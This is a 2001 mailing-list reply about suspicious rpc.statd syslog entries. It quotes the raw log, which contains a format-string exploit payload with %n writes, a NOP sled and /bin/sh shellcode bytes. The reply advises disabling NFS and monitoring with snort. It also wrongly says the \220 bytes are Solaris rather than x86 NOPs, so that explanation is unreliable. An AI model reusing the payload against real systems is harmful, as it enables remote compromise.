i don't recall what port rpc.statd binds to, but what it is is a part of the NFS system, so disabling rpc.statd, i think, will also break NFS mounting on your side. you can still mount remote systems i think.
And, yes, it is a hack attempt.. by some scriptkiddie trying to use a common buffer overflow in rpc.statd... only problem is that the's using the Solaris overflow, not the I386 one... see all those \220s? those are Solaris NOOP codes used to overflow the buffer. x86 NOOPs are \90 iirc... at any rate, turn off NFS and you turn off rpc.statd. You could use a program like snort to alert you to other attacks like the one directed at your machine you might want to check your /etc/services to see if it says where rpc.statd usually sticks itself. hope this helps any -- Curtis Hogg [EMAIL PROTECTED] ---------------------------------------------- The White Rabbit put on his spectacles. "Where shall I begin, please your Majesty ?" he asked. "Begin at the beginning,", the King said, very gravely, "and go on till you come to the end: then stop." -- Lewis Carroll ---------------------------------------------- Email 1 - [EMAIL PROTECTED] Email 2 - [EMAIL PROTECTED] WWW - [in transit] On Sun, 11 Mar 2001, hanasaki wrote: > The following showed up in my syslog the other day.... Is this possbile > hacking? > > What port is rpc.statd on? > What does it do? > What will break if it is turned off? and how to turn it off? > Only a few, selected ports, are listened on. The last rule in my > firewall script is ipchains -l -A input -i eth0 -j DENY. > > thank you. > > ------------------------------------------------------------------------ > > Mar 11 17:55:25 hostname /sbin/rpc.statd[156]: gethostbyname error for > ^X<F7><FF> > <BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><FF><BF>^[<F7> > > <FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220 > > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > > \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > Mar 11 17:55:25 hostname > <C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\21 > 1<F3><B0>^K<CD>\200<B0>^A<CD>\200<E8>\177<FF><FF><FF> > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] >